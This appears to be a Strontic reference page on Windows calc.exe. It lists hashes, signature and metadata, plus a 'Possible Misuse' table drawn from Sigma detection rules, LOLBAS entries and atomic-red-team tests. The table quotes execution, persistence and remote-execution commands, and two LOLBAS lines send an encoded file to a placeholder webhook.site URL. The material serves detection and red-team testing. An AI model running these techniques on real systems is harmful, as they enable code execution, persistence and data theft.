calc.exe
- File Path:
C:\Windows\SysWOW64\calc.exe - Description: Windows Calculator
Hashes
| Type | Hash |
|---|---|
| MD5 | 60FF7F830695B46E4E978968D9A995FE |
| SHA1 | B24FDB248D36D0AB86675169414AB8FED4A21A88 |
| SHA256 | 381A38D6E7A146B99E2BE866B9E95FFE31F0DCFCEC62272C7C0D6B7114C9227F |
| SHA384 | 50DEE8E0221BFC188A90C1F206FDE459C2C9E76BA229C8501CAD99B617AE3E264CF7C1FF8D6C63069FDE7BDC3197A723 |
| SHA512 | F5D5AF45DAC59C4F2602F13608C7F346D114A1E4A5D12B029D75D970E0CB6CFCF39AD3F5B49FAC08CDCF036A2C02EABFCFEA828F3808F1033ADDD245C1000AB7 |
| SSDEEP | 384:dz6kMrov88/sYWS0YWbiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiLiiiiiriiiI:dV7/s1G |
| IMP | BA072A972FE6C47C8CF7A0347BB0AF7A |
| PESHA1 | 12478E95FC8A1BEF2D99344A17AF7C97481104E7 |
| PE256 | 5023ED42968DA7B12DC4343CA409741A2222DD9F68289765BCB2783A30FDC168 |
Runtime Data
Child Processes:
win32calc.exe
Loaded Modules:
| Path |
|---|
| C:\Windows\SYSTEM32\ntdll.dll |
| C:\Windows\System32\wow64.dll |
| C:\Windows\System32\wow64cpu.dll |
| C:\Windows\System32\wow64win.dll |
| C:\Windows\SysWOW64\calc.exe |
Signature
- Status: Signature verified.
- Serial:
33000001C422B2F79B793DACB20000000001C4 - Thumbprint:
AE9C1AE54763822EEC42474983D8B635116C8452 - Issuer: CN=Microsoft Windows Production PCA 2011, O=Microsoft Corporation, L=Redmond, S=Washington, C=US
- Subject: CN=Microsoft Windows, O=Microsoft Corporation, L=Redmond, S=Washington, C=US
File Metadata
- Original Filename: CALC.EXE
- Product Name: Microsoft Windows Operating System
- Company Name: Microsoft Corporation
- File Version: 10.0.17763.1 (WinBuild.160101.0800)
- Product Version: 10.0.17763.1
- Language: English (United States)
- Legal Copyright: Microsoft Corporation. All rights reserved.
- Machine Type: 32-bit
File Scan
- VirusTotal Detections: 0/71
- VirusTotal Link: https://www.virustotal.com/gui/file/381a38d6e7a146b99e2be866b9e95ffe31f0dcfcec62272c7c0d6b7114c9227f/detection/
File Similarity (ssdeep match)
Possible Misuse
The following table contains possible examples of calc.exe being misused. While calc.exe is not inherently malicious, its legitimate functionality can be abused for malicious purposes.
| Source | Source File | Example | License |
|---|---|---|---|
| sigma | proc_creation_win_susp_calc.yml | description: Detects suspicious use of calc.exe with command line parameters or in a suspicious directory, which is likely caused by some PoC or detection evasion |
DRL 1.0 |
| sigma | proc_creation_win_susp_calc.yml | CommandLine\|contains: '\calc.exe ' |
DRL 1.0 |
| sigma | proc_creation_win_susp_calc.yml | Image\|endswith: '\calc.exe' |
DRL 1.0 |
| sigma | proc_creation_win_susp_rundll32_setupapi_installhinfsection.yml | - https://gist.githubusercontent.com/bohops/0cc6586f205f3691e04a1ebf1806aabd/raw/baf7b29891bb91e76198e30889fbf7d6642e8974/calc_exe.inf |
DRL 1.0 |
| sigma | proc_creation_win_susp_system_user_anomaly.yml | - '\calc.exe' |
DRL 1.0 |
| LOLBAS | Explorer.yml | - Command: explorer.exe calc.exe |
|
| LOLBAS | Explorer.yml | Description: 'Executes calc.exe as a subprocess of explorer.exe.' |
|
| LOLBAS | Gpup.yml | - Command: Gpup.exe -w whatever -e c:\Windows\System32\calc.exe |
|
| LOLBAS | Nvudisp.yml | - Command: Nvudisp.exe System calc.exe |
|
| LOLBAS | Nvudisp.yml | Description: Execute calc.exe as a subprocess. |
|
| LOLBAS | Nvudisp.yml | - Command: Nvudisp.exe CreateShortcut test.lnk,"Test","c:\windows\system32\calc.exe\","","c:\windows\system32\" |
|
| LOLBAS | Nvuhda6.yml | - Command: nvuhda6.exe System calc.exe |
|
| LOLBAS | Nvuhda6.yml | Description: Execute calc.exe as a subprocess. |
|
| LOLBAS | Nvuhda6.yml | - Command: nvuhda6.exe CreateShortcut test.lnk,"Test","C:\Windows\System32\calc.exe","","C:\Windows\System32\" |
|
| LOLBAS | Nvuhda6.yml | - Command: nvuhda6.exe KillApp calc.exe |
|
| LOLBAS | Usbinst.yml | Description: Execute calc.exe through DefaultInstall Section Directive in INF file. |
|
| LOLBAS | Bash.yml | - Command: bash.exe -c calc.exe |
|
| LOLBAS | Bash.yml | Description: Executes calc.exe from bash.exe |
|
| LOLBAS | ConfigSecurityPolicy.yml | - Command: ConfigSecurityPolicy.exe C:\\Windows\\System32\\calc.exe https://webhook.site/xxxxxxxxx?encodedfile |
|
| LOLBAS | DataSvcUtil.yml | - Command: DataSvcUtil /out:C:\\Windows\\System32\\calc.exe /uri:https://webhook.site/xxxxxxxxx?encodedfile |
|
| LOLBAS | Diskshadow.yml | - Command: diskshadow> exec calc.exe |
|
| LOLBAS | Explorer.yml | - Command: explorer.exe /root,"C:\Windows\System32\calc.exe" |
|
| LOLBAS | Explorer.yml | Description: Execute calc.exe with the parent process spawning from a new instance of explorer.exe |
|
| LOLBAS | Extrac32.yml | - Command: extrac32.exe /C C:\Windows\System32\calc.exe C:\Users\user\Desktop\calc.exe |
|
| LOLBAS | Extrac32.yml | Description: Command for copying calc.exe to another folder |
|
| LOLBAS | Forfiles.yml | - Command: forfiles /p c:\windows\system32 /m notepad.exe /c calc.exe |
|
| LOLBAS | Forfiles.yml | Description: Executes calc.exe since there is a match for notepad.exe in the c:\windows\System32 folder. |
|
| LOLBAS | Ftp.yml | - Command: echo !calc.exe > ftpcommands.txt && ftp -s:ftpcommands.txt |
|
| LOLBAS | Hh.yml | - Command: HH.exe c:\windows\system32\calc.exe |
|
| LOLBAS | Hh.yml | Description: Executes calc.exe with HTML Help. |
|
| LOLBAS | Pcalua.yml | - Command: pcalua.exe -a calc.exe |
|
| LOLBAS | Rundll32.yml | Description: Use Rundll32.exe to execute a JavaScript script that runs calc.exe. |
|
| LOLBAS | Rundll32.yml | - Command: rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";document.write();h=new%20ActiveXObject("WScript.Shell").run("calc.exe",0,true);try{h.Send();b=h.ResponseText;eval(b);}catch(e){new%20ActiveXObject("WScript.Shell").Run("cmd /c taskkill /f /im rundll32.exe",0,true);} |
|
| LOLBAS | Rundll32.yml | Description: Use Rundll32.exe to execute a JavaScript script that runs calc.exe and then kills the Rundll32.exe process that was started. |
|
| LOLBAS | Scriptrunner.yml | - Command: Scriptrunner.exe -appvscript calc.exe |
|
| LOLBAS | Scriptrunner.yml | Description: Executes calc.exe |
|
| LOLBAS | Ttdinject.yml | - Command: TTDInject.exe /ClientParams "7 tmp.run 0 0 0 0 0 0 0 0 0 0" /Launch "C:/Windows/System32/calc.exe" |
|
| LOLBAS | Ttdinject.yml | - Command: ttdinject.exe /ClientScenario TTDRecorder /ddload 0 /ClientParams "7 tmp.run 0 0 0 0 0 0 0 0 0 0" /launch "C:/Windows/System32/calc.exe" |
|
| LOLBAS | Tttracer.yml | - Command: tttracer.exe C:\windows\system32\calc.exe |
|
| LOLBAS | Wlrmdr.yml | - Command: "wlrmdr.exe -s 3600 -f 0 -t _ -m _ -a 11 -u calc.exe" |
|
| LOLBAS | Wlrmdr.yml | Description: Execute calc.exe with wlrmdr.exe as parent process |
|
| LOLBAS | Advpack.yml | - Command: rundll32.exe advpack.dll,RegisterOCX calc.exe |
|
| LOLBAS | Advpack.yml | - Command: rundll32 advpack.dll, RegisterOCX "cmd.exe /c calc.exe" |
|
| LOLBAS | Ieadvpack.yml | - Command: rundll32.exe ieadvpack.dll,RegisterOCX calc.exe |
|
| LOLBAS | Ieadvpack.yml | - Command: rundll32 ieadvpack.dll, RegisterOCX "cmd.exe /c calc.exe" |
|
| LOLBAS | Pcwutl.yml | - Command: rundll32.exe pcwutl.dll,LaunchApplication calc.exe |
|
| LOLBAS | Setupapi.yml | - Command: rundll32.exe setupapi.dll,InstallHinfSection DefaultInstall 128 C:\\Tools\\calc_exe.inf |
|
| LOLBAS | Setupapi.yml | - Code: https://gist.githubusercontent.com/bohops/0cc6586f205f3691e04a1ebf1806aabd/raw/baf7b29891bb91e76198e30889fbf7d6642e8974/calc_exe.inf |
|
| LOLBAS | Url.yml | - Command: rundll32.exe url.dll,FileProtocolHandler calc.exe |
|
| LOLBAS | Zipfldr.yml | - Command: rundll32.exe zipfldr.dll,RouteTheCall calc.exe |
|
| LOLBAS | Manage-bde.yml | - Command: set comspec=c:\windows\system32\calc.exe & cscript c:\windows\system32\manage-bde.wsf |
|
| LOLBAS | Appvlp.yml | - Command: AppVLP.exe powershell.exe -c "$e=New-Object -ComObject shell.application;$e.ShellExecute('calc.exe','', '', 'open', 1)" |
|
| LOLBAS | Sqltoolsps.yml | - Command: SQLToolsPS.exe -noprofile -command Start-Process calc.exe |
|
| LOLBAS | Vsjitdebugger.yml | - Command: Vsjitdebugger.exe calc.exe |
|
| LOLBAS | Vsjitdebugger.yml | Description: Executes calc.exe as a subprocess of Vsjitdebugger.exe. |
|
| LOLBAS | Wsl.yml | - Command: wsl.exe -e /mnt/c/Windows/System32/calc.exe |
|
| LOLBAS | Wsl.yml | Description: Executes calc.exe from wsl.exe |
|
| atomic-red-team | problem_report.md | e.g. The atomic test executes and calc.exe is launched. |
MIT License. © 2018 Red Canary |
| atomic-red-team | T1021.003.md | Upon successful execution, cmd will spawn calc.exe on a remote computer. | MIT License. © 2018 Red Canary |
| atomic-red-team | T1021.003.md | [activator]::CreateInstance([type]::GetTypeFromProgID(“MMC20.application”,”#{computer_name}”)).Document.ActiveView.ExecuteShellCommand(“c:\windows\system32\calc.exe”, $null, $null, “7”) | MIT License. © 2018 Red Canary |
| atomic-red-team | T1027.004.md | | input_file | C# code that launches calc.exe from a hidden cmd.exe Window | Path | PathToAtomicsFolder\T1027.004\src\calc.cs| | MIT License. © 2018 Red Canary |
| atomic-red-team | T1036.003.md | | exe_path | path to exe to use when creating masquerading files | Path | C:\Windows\System32\calc.exe| | MIT License. © 2018 Red Canary |
| atomic-red-team | T1053.005.md | schtasks /create /tn “T1053_005_OnLogon” /sc onlogon /tr “cmd.exe /c calc.exe” | MIT License. © 2018 Red Canary |
| atomic-red-team | T1053.005.md | schtasks /create /tn “T1053_005_OnStartup” /sc onstart /ru system /tr “cmd.exe /c calc.exe” | MIT License. © 2018 Red Canary |
| atomic-red-team | T1053.005.md | $Action = New-ScheduledTaskAction -Execute “calc.exe” | MIT License. © 2018 Red Canary |
| atomic-red-team | T1106.md | Execute program by leveraging Win32 API’s. By default, this will launch calc.exe from the command prompt. | MIT License. © 2018 Red Canary |
| atomic-red-team | T1112.md | | new_executable | New executable to run on startup instead of Windows Defender | String | calc.exe| | MIT License. © 2018 Red Canary |
| atomic-red-team | T1134.004.md | calc.exe will be launched. | MIT License. © 2018 Red Canary |
| atomic-red-team | T1140.md | | executable | name of executable | Path | C:\Windows\System32\calc.exe| | MIT License. © 2018 Red Canary |
| atomic-red-team | T1140.md | | executable | name of executable/file to decode | Path | C:\Windows\System32\calc.exe| | MIT License. © 2018 Red Canary |
| atomic-red-team | T1202.md | Upon execution, calc.exe should open | MIT License. © 2018 Red Canary |
| atomic-red-team | T1202.md | | payload_path | Path to payload | Path | C:\Windows\System32\calc.exe| | MIT License. © 2018 Red Canary |
| atomic-red-team | T1202.md | | process | Process to execute | String | calc.exe| | MIT License. © 2018 Red Canary |
| atomic-red-team | T1202.md | “This is basically saying for each occurrence of notepad.exe in c:\windows\system32 run calc.exe” | MIT License. © 2018 Red Canary |
| atomic-red-team | T1202.md | Upon execution calc.exe will be opened. | MIT License. © 2018 Red Canary |
| atomic-red-team | T1204.002.md | Microsoft Office creating then launching a .bat script from an AppData directory. The .bat file launches calc.exe when opened. | MIT License. © 2018 Red Canary |
| atomic-red-team | T1204.002.md | $macrocode = “ Open "#{bat_path}” For Output As #1n Write #1, “calc.exe"n Close #1n a = Shell(“cmd.exe /c $bat_path ", vbNormalFocus)n” |
MIT License. © 2018 Red Canary |
| atomic-red-team | T1204.002.md | and pull down the script and execute it. By default the payload will execute calc.exe on the system. | MIT License. © 2018 Red Canary |
| atomic-red-team | T1216.md | Upon execution, calc.exe will be launched. | MIT License. © 2018 Red Canary |
| atomic-red-team | T1216.md | | command_to_execute | A command to execute. | Path | %windir%\System32\calc.exe| | MIT License. © 2018 Red Canary |
| atomic-red-team | T1218.md | | powershell_code | PowerShell code to execute | String | Start-Process calc.exe| | MIT License. © 2018 Red Canary |
| atomic-red-team | T1218.md | Emulates attack with Microsoft.Workflow.Compiler.exe running a .Net assembly that launches calc.exe | MIT License. © 2018 Red Canary |
| atomic-red-team | T1218.md | Emulates attack with a renamed Microsoft.Workflow.Compiler.exe running a .Net assembly that launches calc.exe | MIT License. © 2018 Red Canary |
| atomic-red-team | T1218.001.md | Upon execution calc.exe will open | MIT License. © 2018 Red Canary |
| atomic-red-team | T1218.002.md | Upon execution calc.exe will be launched | MIT License. © 2018 Red Canary |
| atomic-red-team | T1218.005.md | Test execution of a remote script using mshta.exe. Upon execution calc.exe will be launched. | MIT License. © 2018 Red Canary |
| atomic-red-team | T1218.005.md | Execute an arbitrary remote HTA. Upon execution calc.exe will be launched. | MIT License. © 2018 Red Canary |
| atomic-red-team | T1218.010.md | Regsvr32.exe is a command-line program used to register and unregister OLE controls. Upon execution, calc.exe will be launched. | MIT License. © 2018 Red Canary |
| atomic-red-team | T1218.010.md | windows defender real-time protection to fix it. Upon execution, calc.exe will be launched. | MIT License. © 2018 Red Canary |
| atomic-red-team | T1218.011.md | Upon execution calc.exe will be launched | MIT License. © 2018 Red Canary |
| atomic-red-team | T1218.011.md | | command_to_execute | Command for rundll32.exe to execute | String | calc.exe| | MIT License. © 2018 Red Canary |
| atomic-red-team | T1218.011.md | Upon successful execution, Calc.exe will spawn. | MIT License. © 2018 Red Canary |
| atomic-red-team | T1546.012.md | | target_binary | Binary To Attach To | Path | C:\Windows\System32\calc.exe| | MIT License. © 2018 Red Canary |
| atomic-red-team | T1546.013.md | Appends a start process cmdlet to the current user’s powershell profile pofile that points to a malicious executable. Upon execution, calc.exe will be launched. | MIT License. © 2018 Red Canary |
| atomic-red-team | T1546.013.md | | exe_path | Path the malicious executable | Path | calc.exe| | MIT License. © 2018 Red Canary |
| atomic-red-team | T1547.001.md | $Target = “C:\Windows\System32\calc.exe” | MIT License. © 2018 Red Canary |
| atomic-red-team | T1547.001.md | $ShortcutLocation = “$home\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\calc_exe.lnk” | MIT License. © 2018 Red Canary |
| atomic-red-team | T1547.001.md | Remove-Item “$home\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\calc_exe.lnk” -ErrorAction Ignore | MIT License. © 2018 Red Canary |
| atomic-red-team | T1547.009.md | Upon execution, calc.exe will be launched. | MIT License. © 2018 Red Canary |
| atomic-red-team | T1547.009.md | echo URL=C:\windows\system32\calc.exe » #{shortcut_file_path} | MIT License. © 2018 Red Canary |
| atomic-red-team | T1559.002.md | {DDEAUTO c:\windows\system32\cmd.exe “/k calc.exe” } | MIT License. © 2018 Red Canary |
| atomic-red-team | T1559.002.md | 9. DDEAUTO c:\windows\system32\cmd.exe “/k calc.exe” | MIT License. © 2018 Red Canary |
| atomic-red-team | T1564.md | This module extracts a binary (calc.exe) from inside of another binary. | MIT License. © 2018 Red Canary |
| atomic-red-team | T1564.003.md | Upon execution a hidden PowerShell window will launch calc.exe | MIT License. © 2018 Red Canary |
| atomic-red-team | T1564.003.md | | powershell_command | Command to launch calc.exe from a hidden PowerShell Window | String | powershell.exe -WindowStyle hidden calc.exe| | MIT License. © 2018 Red Canary |
| atomic-red-team | T1569.002.md | Upon successful execution, cmd will utilize psexec.exe to spawn calc.exe on a remote endpoint (default:localhost). | MIT License. © 2018 Red Canary |
| atomic-red-team | T1569.002.md | #{psexec_exe} \#{remote_host} -u #{user_name} -p #{password} -accepteula “C:\Windows\System32\calc.exe” | MIT License. © 2018 Red Canary |
| atomic-red-team | T1574.002.md | Upon execution, calc.exe will be opened. | MIT License. © 2018 Red Canary |
| signature-base | thor-webshells.yar | $s7 = “""%windir%\\calc.exe"")” | CC BY-NC 4.0 |
MIT License. Copyright (c) 2020-2021 Strontic.